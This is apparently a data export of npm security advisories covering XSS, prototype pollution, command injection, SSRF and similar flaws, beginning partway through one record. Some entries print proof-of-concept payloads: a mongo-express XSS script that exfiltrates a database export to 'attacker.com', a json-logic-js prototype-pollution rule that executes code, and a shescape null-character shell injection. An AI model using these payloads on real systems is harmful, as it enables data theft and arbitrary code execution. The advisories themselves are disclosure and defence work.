### Impact After changing the function from synchronous to asynchronous there wasn't implemented handler in the [start](https://docs.create-magento-app.com/getting-started/available-commands/start), [stop](https://docs.create-magento-app.com/getting-started/available-commands/stop), [exec](https://docs.create-magento-app.com/getting-started/available-commands/exec) and [logs](https://docs.create-magento-app.com/getting-started/available-commands/logs) commands, effectively making them unusable. ### Patches [Version 1.5.3](https://github.com/scandipwa/create-magento-app/releases/tag/%40scandipwa%2Fmagento-scripts%401.5.3) contains patches for the problems described above. ### Workarounds Upgrade to patched or latest (recommended) version `npm i @scandipwa/magento-scripts@1.5.3` or `npm i @scandipwa/magento-scripts@latest`. ### References New releases always available here: https://github.com/scandipwa/create-magento-app/releases ### For more information If you have any questions or comments about this advisory: * Open an issue in [create-magento-app](https://github.com/scandipwa/create-magento-app/issues)
{'CVE-2021-32684'}
2021-06-16T20:15:07Z
2021-06-21T17:10:02Z
MODERATE
null
{'CWE-670'}
{'https://github.com/scandipwa/create-magento-app/security/advisories/GHSA-52qp-gwwh-qrg4', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32684', 'https://github.com/scandipwa/create-magento-app/commit/89115db7031e181eb8fb4ec2822bc6cab88e7071'}
null
{'https://github.com/scandipwa/create-magento-app/commit/89115db7031e181eb8fb4ec2822bc6cab88e7071'}
{'https://github.com/scandipwa/create-magento-app/commit/89115db7031e181eb8fb4ec2822bc6cab88e7071'}
npm
GHSA-g4xp-36c3-f7mr
Hidden Directories Always Served in inert
Versions 1.1.1 and earlier of `inert` are vulnerable to an information leakage vulnerability which causes files in hidden directories to be served, even when showHidden is false. The inert directory handler always allows files in hidden directories to be served, even when `showHidden` is false. ## Recommendation Update to version >= 1.1.1.
{'CVE-2014-10068'}
2020-08-31T18:07:50Z
2020-08-31T22:47:41Z
MODERATE
null
{'CWE-22'}
{'https://github.com/hapijs/inert/pull/15', 'https://nodesecurity.io/advisories/14', 'https://www.npmjs.com/advisories/14', 'https://nvd.nist.gov/vuln/detail/CVE-2014-10068', 'https://github.com/hapijs/inert/commit/e8f99f94da4cb08e8032eda984761c3f111e3e82'}
null
{'https://github.com/hapijs/inert/commit/e8f99f94da4cb08e8032eda984761c3f111e3e82'}
{'https://github.com/hapijs/inert/commit/e8f99f94da4cb08e8032eda984761c3f111e3e82'}
npm
GHSA-mpjm-v997-c4h4
Sandboxed renderers can obtain thumbnails of arbitrary files through the nativeImage API
### Impact This vulnerability allows a sandboxed renderer to request a "thumbnail" image of an arbitrary file on the user's system. The thumbnail can potentially include significant parts of the original file, including textual data in many cases. All current stable versions of Electron are affected. ### Patches This was fixed with #30728, and the following Electron versions contain the fix: - 15.0.0-alpha.10 - 14.0.0 - 13.3.0 - 12.1.0 - 11.5.0 ### Workarounds If your app enables `contextIsolation`, this vulnerability is significantly more difficult for an attacker to exploit. Further, if your app does not depend on the `createThumbnailFromPath` API, then you can simply disable the functionality. In the main process, before the 'ready' event: ```js delete require('electron').nativeImage.createThumbnailFromPath ``` ### For more information If you have any questions or comments about this advisory, email us at [security@electronjs.org](mailto:security@electronjs.org).
{'CVE-2021-39184'}
2021-10-12T18:54:44Z
2021-10-12T21:59:13Z
MODERATE
null
{'CWE-668'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39184', 'https://github.com/electron/electron/pull/30728/commits/8fed645bd671f359ee52d806c075ec4e07eda17f', 'https://github.com/electron/electron/pull/30728', 'https://github.com/electron/electron', 'https://github.com/electron/electron/security/advisories/GHSA-mpjm-v997-c4h4'}
null
{'https://github.com/electron/electron/pull/30728/commits/8fed645bd671f359ee52d806c075ec4e07eda17f'}
{'https://github.com/electron/electron/pull/30728/commits/8fed645bd671f359ee52d806c075ec4e07eda17f'}
npm
GHSA-pc5p-h8pf-mvwp
Machine-In-The-Middle in https-proxy-agent
Versions of `https-proxy-agent` prior to 2.2.3 are vulnerable to Machine-In-The-Middle. The package fails to enforce TLS on the socket if the proxy server responds the to the request with a HTTP status different than 200. This allows an attacker with access to the proxy server to intercept unencrypted communications, which may include sensitive information such as credentials. ## Recommendation Upgrade to version 3.0.0 or 2.2.3.
null
2021-08-23T15:27:24Z
2020-04-16T03:14:56Z
MODERATE
null
{'CWE-300'}
{'https://www.npmjs.com/advisories/1184', 'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b', 'https://snyk.io/vuln/SNYK-JS-HTTPSPROXYAGENT-469131', 'https://hackerone.com/reports/541502'}
null
{'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b'}
{'https://github.com/TooTallNate/node-https-proxy-agent/commit/36d8cf509f877fa44f4404fce57ebaf9410fe51b'}
npm
GHSA-28hp-fgcr-2r4h
Cross-Site Scripting via JSONP
JSONP allows untrusted resource URLs, which provides a vector for attack by malicious actors.
null
2021-02-24T18:32:36Z
2019-06-27T17:25:42Z
MODERATE
null
{'CWE-79'}
{'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4', 'https://www.npmjs.com/advisories/1630'}
null
{'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4'}
{'https://github.com/angular/angular.js/commit/6476af83cd0418c84e034a955b12a842794385c4'}
npm
GHSA-r659-8xfp-j327
Prototype Pollution in objection.js
objection.js prior to version 2.2.16 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution'). This issue is patched in version 2.2.16.
{'CVE-2021-3766'}
2021-10-08T20:12:33Z
2021-09-07T23:09:43Z
CRITICAL
null
{'CWE-915', 'CWE-1321'}
{'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9', 'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6', 'https://github.com/vincit/objection.js', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3766', 'https://huntr.dev/bounties/c98e0f0e-ebf2-4072-be73-a1848ea031cc'}
null
{'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6', 'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9'}
{'https://github.com/Vincit/objection.js/commit/46b842a6bc897198b83f41ac85c92864b991d7e9', 'https://github.com/vincit/objection.js/commit/b41aab8dcd78f426f7468dcda541a7aca18a66a6'}
npm
GHSA-773h-w45w-f2f9
Denial of service vulnerability exists in libxmljs
libxmljs provides libxml bindings for v8 javascript engine. This affects all versions of package libxmljs. When invoking the libxmljs.parseXml function with a non-buffer argument the V8 code will attempt invoking the .toString method of the argument. If the argument's toString value is not a Function object V8 will crash.
{'CVE-2022-21144'}
2022-05-04T14:48:04Z
2022-05-03T00:00:46Z
HIGH
null
{'CWE-400'}
{'https://snyk.io/vuln/SNYK-JS-LIBXMLJS-2348756', 'https://github.com/libxmljs/libxmljs/commit/2501807bde9b38cfaed06d1e140487516d91379d', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21144', 'https://github.com/libxmljs/libxmljs/pull/594', 'https://github.com/libxmljs/libxmljs'}
null
{'https://github.com/libxmljs/libxmljs/commit/2501807bde9b38cfaed06d1e140487516d91379d'}
{'https://github.com/libxmljs/libxmljs/commit/2501807bde9b38cfaed06d1e140487516d91379d'}
npm
GHSA-6gww-qpm6-mc2g
Server-Side Request Forgery in ssrf-agent
The package ssrf-agent before 1.0.5 are vulnerable to Server-side Request Forgery (SSRF) via the defaultIpChecker function. It fails to properly validate if the IP requested is private.
{'CVE-2021-23718'}
2021-11-29T15:08:38Z
2021-12-02T17:51:51Z
MODERATE
null
{'CWE-918'}
{'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346', 'https://security.netapp.com/advisory/ntap-20211203-0005/', 'https://snyk.io/vuln/SNYK-JS-SSRFAGENT-1584362', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23718', 'https://github.com/welefen/ssrf-agent', 'https://github.com/welefen/ssrf-agent/blob/cec2b85fe8886ad6926a247a3e059d8369ec022b/index.js%23L13'}
null
{'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346'}
{'https://github.com/welefen/ssrf-agent/commit/9607175acd0647d821bae4e8fcc3b712aca3fd2d#diff-e727e4bdf3657fd1d798edcd6b099d6e092f8573cba266154583a746bba0f346'}
npm
GHSA-vqmr-957g-r7w3
High severity vulnerability that affects rendertron
Installed packages are exposed by node_modules in Rendertron 1.0.0, allowing remote attackers to read absolute paths on the server by examining the "_where" attribute of package.json files.
{'CVE-2017-18355'}
2021-09-20T22:15:14Z
2019-02-12T15:36:39Z
HIGH
null
{'CWE-200'}
{'https://github.com/GoogleChrome/rendertron/pull/88', 'https://github.com/GoogleChrome/rendertron', 'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18355', 'https://github.com/advisories/GHSA-vqmr-957g-r7w3', 'https://bugs.chromium.org/p/chromium/issues/detail?id=759111'}
null
{'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e'}
{'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e'}
npm
GHSA-hjgp-8ffr-hwwr
Downloads Resources over HTTP in closurecompiler
Affected versions of `closurecompiler` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `closurecompiler`. ## Recommendation Update to version 1.6.1 or later.
{'CVE-2016-10582'}
2021-01-08T18:40:45Z
2019-02-18T23:51:19Z
HIGH
null
{'CWE-311'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10582', 'https://github.com/advisories/GHSA-hjgp-8ffr-hwwr', 'https://nodesecurity.io/advisories/169', 'https://www.npmjs.com/advisories/169', 'https://github.com/dcodeIO/ClosureCompiler.js/commit/e59848f5975e5b15279c044daf9cff8ff192bae6'}
null
{'https://github.com/dcodeIO/ClosureCompiler.js/commit/e59848f5975e5b15279c044daf9cff8ff192bae6'}
{'https://github.com/dcodeIO/ClosureCompiler.js/commit/e59848f5975e5b15279c044daf9cff8ff192bae6'}
npm
GHSA-mc7w-4cjf-c973
OS Command Injection in node-opencv
utils/find-opencv.js in node-opencv (aka OpenCV bindings for Node.js) prior to 6.1.0 is vulnerable to Command Injection. It does not validate user input allowing attackers to execute arbitrary commands.
{'CVE-2019-10061'}
2021-10-07T19:30:03Z
2021-10-12T22:06:57Z
CRITICAL
null
{'CWE-78'}
{'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b', 'https://www.npmjs.com/advisories/789', 'https://www.npmjs.com/package/opencv', 'https://github.com/peterbraden/node-opencv/', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10061', 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563'}
null
{'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563', 'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b'}
{'https://github.com/peterbraden/node-opencv/commit/81a4b8620188e89f7e4fc985f3c89b58d4bcc86b', 'https://github.com/peterbraden/node-opencv/commit/aaece6921d7368577511f06c94c99dd4e9653563'}
npm
GHSA-m9hw-7xfv-wqg7
Prototype Pollution in json-logic-js
Versions of json-logic-js prior to 2.0.0 are vulnerable to Prototype Pollution. The method operation allows a malicious user to modify the prototype of Object through the method property name. This causes modification of any existing property that will exist on all objects and leads to Remote Code Execution. The following rule creates a popup when run from a browser: ``` { "method": [ { "method": [ { "var": "__proto__.constructor.is.__proto__" }, "constructor", [ "var x = 'SECURITY!'; console.log(x, window.fetch); alert(x)" ] ] }, "call" ] } ```
null
2020-11-12T19:35:53Z
2020-11-12T19:36:14Z
HIGH
null
{'CWE-471'}
{'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b', 'https://www.npmjs.com/advisories/1542', 'https://www.npmjs.com/package/json-logic-js'}
null
{'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b'}
{'https://github.com/jwadhams/json-logic-js/commit/fadfa5dc7ccd1cc5c9a1900a97a15af390bf642b'}
npm
GHSA-9p47-w5xp-f4xr
Downloads Resources over HTTP in windows-build-tools
Affected versions of `windows-build-tools` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `windows-build-tools`. ## Recommendation Update to version 1.0.0 or later.
{'CVE-2017-16003'}
2021-01-08T19:03:25Z
2018-11-09T17:48:37Z
HIGH
null
{'CWE-311'}
{'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16003', 'https://github.com/advisories/GHSA-9p47-w5xp-f4xr', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://www.npmjs.com/advisories/304', 'https://nodesecurity.io/advisories/304'}
null
{'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)'}
{'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90', 'https://github.com/felixrieseberg/windows-build-tools/commit/9835d33e68f2cb5e4d148e954bb3ed0221d98e90)'}
npm
GHSA-hjp8-2cm3-cc45
Cookie exposure in requestretry
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository fgribreau/node-request-retry prior to 7.0.0 via cookies being leaked to external sites.
{'CVE-2022-0654'}
2022-03-03T22:02:13Z
2022-02-24T00:00:54Z
HIGH
null
{'CWE-200'}
{'https://huntr.dev/bounties/a779faf5-c2cc-48be-a31d-4ddfac357afc', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0654', 'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a'}
null
{'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a'}
{'https://github.com/fgribreau/node-request-retry/commit/0979c6001d9d57c2aac3157c11b007397158922a'}
npm
GHSA-hwcf-pp87-7x6p
Moderate severity vulnerability that affects ejs
nodejs ejs version older than 2.5.5 is vulnerable to a Cross-site-scripting in the ejs.renderFile() resulting in code injection
{'CVE-2017-1000188'}
2021-09-14T17:32:09Z
2017-11-30T23:15:05Z
MODERATE
null
{'CWE-79'}
{'http://www.securityfocus.com/bid/101889', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000188', 'https://github.com/advisories/GHSA-hwcf-pp87-7x6p', 'https://github.com/mde/ejs', 'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f'}
null
{'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f'}
{'https://github.com/mde/ejs/commit/49264e0037e313a0a3e033450b5c184112516d8f'}
npm
GHSA-f2rp-38vg-j3gh
Null characters not escaped
### Impact Anyone using _Shescape_ to defend against shell injection may still be vulnerable against shell injection if the attacker manages to insert a [null character](https://en.wikipedia.org/wiki/Null_character) into the payload. For example (on Windows): ```javascript const cp = require("child_process"); const shescape = require("shescape"); const nullChar = String.fromCharCode(0); const payload = "foo\" && ls -al ${nullChar} && echo \"bar"; console.log(cp.execSync(`echo ${shescape.quote(payload)}`)); // foototal 3 // drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:44 . // drwxr-xr-x 1 owner XXXXXX 0 Mar 13 00:09 .. // drwxr-xr-x 1 owner XXXXXX 0 Mar 13 18:42 folder // -rw-r--r-- 1 owner XXXXXX 0 Mar 13 18:42 file ``` ### Patches The problem has been patched in [v1.1.3](https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3) which you can upgrade to now. No further changes are required. ### Workarounds Alternatively, null characters can be stripped out manually using e.g. `arg.replace(/\u{0}/gu, "")`
{'CVE-2021-21384'}
2021-03-18T23:43:39Z
2021-03-18T23:47:56Z
HIGH
null
{'CWE-88'}
{'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-f2rp-38vg-j3gh', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21384', 'https://github.com/ericcornelissen/shescape/releases/tag/v1.1.3', 'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b', 'https://www.npmjs.com/package/shescape'}
null
{'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b'}
{'https://github.com/ericcornelissen/shescape/commit/07a069a66423809cbedd61d980c11ca44a29ea2b'}
npm
GHSA-h24f-9mm4-w336
Cross-site Scripting (XSS) - Stored in crud-file-server
Versions of `crud-file-server` before 0.8.0 are vulnerable to stored cross-site scripting (XSS). This is due to insufficient santiziation of filenames when directory index is served by `crud-file-server`. ## Recommendation Update to version 0.8.0 or later.
{'CVE-2018-3726'}
2020-08-31T18:28:12Z
2018-07-18T18:34:27Z
CRITICAL
null
{'CWE-79'}
{'https://hackerone.com/reports/311101', 'https://www.npmjs.com/advisories/570', 'https://github.com/advisories/GHSA-h24f-9mm4-w336', 'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3726'}
null
{'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa'}
{'https://github.com/omphalos/crud-file-server/commit/4155bfe068bf211b49a0b3ffd06e78cbaf1b40fa'}
npm
GHSA-whv6-rj84-2vh2
Cross-Site Scripting in nextcloud-vue-collections
Versions of `nextcloud-vue-collections` prior to 0.4.2 are vulnerable to Cross-Site Scripting (XSS). The `v-tooltip` component has an insecure `defaultHTML` configuration that allows arbitrary JavaScript to be injected in the tooltip of a collection item. This allows attackers to execute arbitrary code in a victim's browser. ## Recommendation Upgrade to version 0.4.2 or later.
null
2021-10-04T20:36:41Z
2020-09-04T17:21:58Z
HIGH
null
{'CWE-79'}
{'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583', 'https://github.com/juliushaertl/nextcloud-vue-collections', 'https://www.npmjs.com/advisories/1442'}
null
{'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583'}
{'https://github.com/juliushaertl/nextcloud-vue-collections/commit/8ec1fca214f003538cec4137792ede928f25f583'}
npm
GHSA-3xc7-xg67-pw99
Sensitive Data Exposure in sequelize-cli
Versions of `sequelize-cli` prior to 5.5.0 are vulnerable to Sensitive Data Exposure. The function `filteredURL()` does not properly sanitize the `config.password` value which may cause passwords with special characters to be logged in plain text. ## Recommendation Upgrade to version 5.5.0 or later.
null
2021-08-04T20:54:45Z
2019-06-05T20:43:10Z
LOW
null
{'CWE-532'}
{'https://github.com/sequelize/cli/pull/722', 'https://www.npmjs.com/advisories/825', 'https://github.com/sequelize/cli/issues/172', 'https://snyk.io/vuln/SNYK-JS-SEQUELIZECLI-174320', 'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'}
null
{'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'}
{'https://github.com/FelixLC/cli/commit/da59652c061a798282e18efad0b6d0afefa15465'}
npm
GHSA-4f6x-49g2-99fm
Cross-site Scripting in Mermaid
Mermaid before 8.11.0 allows XSS when the antiscript feature is used.
{'CVE-2021-35513'}
2021-07-02T16:59:18Z
2021-12-10T18:57:41Z
MODERATE
null
{'CWE-79'}
{'https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2', 'https://github.com/mermaid-js/mermaid/pull/2123', 'https://github.com/mermaid-js/mermaid/issues/2122', 'https://nvd.nist.gov/vuln/detail/CVE-2021-35513', 'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e'}
null
{'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e'}
{'https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e'}
npm
GHSA-jcw8-r9xm-32c6
Command Injection in dns-sync
Affected versions of `dns-sync` have an arbitrary command execution vulnerability in the `resolve()` method. ## Recommendation - Use an alternative dns resolver - Do not allow untrusted input into `dns-sync.resolve()`
{'CVE-2017-16100'}
2020-08-31T18:26:20Z
2018-07-18T18:28:02Z
CRITICAL
null
{'CWE-94'}
{'https://nodesecurity.io/advisories/523', 'https://github.com/skoranga/node-dns-sync/issues/5', 'https://www.npmjs.com/advisories/523', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16100', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d', 'https://www.npmjs.com/advisories/153', 'https://github.com/skoranga/node-dns-sync/issues/1', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))', 'https://github.com/skoranga/node-dns-sync/issues/1)', 'https://github.com/advisories/GHSA-jcw8-r9xm-32c6'}
null
{'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d'}
{'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d)))', 'https://github.com/skoranga/node-dns-sync/commit/d9abaae384b198db1095735ad9c1c73d7b890a0d'}
npm
GHSA-hrpp-f84w-xhfg
Outdated Static Dependency in vue-moment
Versions of `vue-moment` prior to 4.1.0 contain an Outdated Static Dependency. The package depends on `moment` and has it loaded statically instead of as a dependency that can be updated. It has `moment@2.19.1` that contains a Regular Expression Denial of Service vulnerability. ## Recommendation Upgrade to version 4.1.0 or later.
null
2021-10-04T19:13:23Z
2020-09-04T16:55:06Z
MODERATE
null
{'CWE-1104'}
{'https://www.npmjs.com/advisories/532', 'https://www.npmjs.com/advisories/1425', 'https://github.com/brockpetrie/vue-moment', 'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e', 'https://snyk.io/vuln/SNYK-JS-VUEMOMENT-538934'}
null
{'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e'}
{'https://github.com/brockpetrie/vue-moment/commit/a265e54660a7181a6795a12a97cebac5b305746e'}
npm
GHSA-whrh-9j4q-g7ph
CSRF Vulnerability in polaris-website
### Impact CSRF vulnerability: In some very specific circumstances, an attacker would be able to update your settings. Basically you would need to navigate to hackersite.com while logged into our panel. Then they could modify your settings. They couldn't check if it worked, nor could they read your settings. ### Patches As of v1.1.1 this has been patched by implementing the Double submit pattern using a cookie. ### For more information If you have any questions or comments about this advisory: * Open an issue in [Polaris-React](https://github.com/polaris-rbx/polaris-react) * Email us at [hi@nezto.re](mailto:hi@nezto.re) * Join our discord (preferred): https://discord.gg/QevWabU
null
2021-09-23T18:38:11Z
2020-08-05T21:43:19Z
MODERATE
null
{'CWE-352'}
{'https://github.com/polaris-rbx/Polaris-React/security/advisories/GHSA-whrh-9j4q-g7ph', 'https://snyk.io/vuln/SNYK-JS-POLARISWEBSITE-597473', 'https://www.barracuda.com/glossary/csrf', 'https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f', 'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b', 'https://github.com/polaris-rbx/Polaris-React', 'https://owasp.org/www-community/attacks/csrf'}
null
{'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b'}
{'https://github.com/polaris-rbx/Polaris-React/commit/b64673d91e83c0737616a0770d8208727730808b'}
npm
GHSA-7p8h-86p5-wv3p
Cross-site scripting
Two kinds of XSS were found: 1. As mentioned in https://github.com/mongo-express/mongo-express/issues/577 when the content of a cell grows larger than supported size, clicking on a row will show full document unescaped, however this needs admin interaction on cell. 2. Data cells identified as media will be rendered as media, without being sanitized. Example of different renders: image, audio, video, etc. ### Impact As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload: ```JSON {"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" } ``` This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible. ### Patches Upgrade to `v1.0.0-alpha.4` ### For more information If you have any questions or comments about this advisory: * Open an issue in [mongo-express](https://github.com/mongo-express/mongo-express/issues/new) * Email me at [jafar.akhoondali@gmail.com](mailto:jafar.akhoondali@gmail.com)
{'CVE-2021-21422'}
2021-06-22T15:44:45Z
2021-06-28T17:18:04Z
HIGH
null
{'CWE-79'}
{'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21422', 'https://github.com/mongo-express/mongo-express/security/advisories/GHSA-7p8h-86p5-wv3p', 'https://github.com/mongo-express/mongo-express/issues/577'}
null
{'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b'}
{'https://github.com/mongo-express/mongo-express/commit/f5e0d4931f856f032f22664b5e5901d5950cfd4b'}
npm
GHSA-3q6f-8grx-pr4v
Cross-site scripting in jspdf
"It's possible to use nested script tags in order to bypass the filtering regex."
{'CVE-2020-7691'}
2021-04-09T17:33:02Z
2021-05-11T16:43:52Z
MODERATE
null
{'CWE-79'}
{'https://github.com/MrRio/jsPDF/commit/d0323215b1a1cd1c35bf2b213274ae1e4797715d', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-575253', 'https://github.com/MrRio/jsPDF/issues/2971', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-575255', 'https://snyk.io/vuln/SNYK-JS-JSPDF-568273', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-575252', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7691', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBMRRIO-575254'}
null
{'https://github.com/MrRio/jsPDF/commit/d0323215b1a1cd1c35bf2b213274ae1e4797715d'}
{'https://github.com/MrRio/jsPDF/commit/d0323215b1a1cd1c35bf2b213274ae1e4797715d'}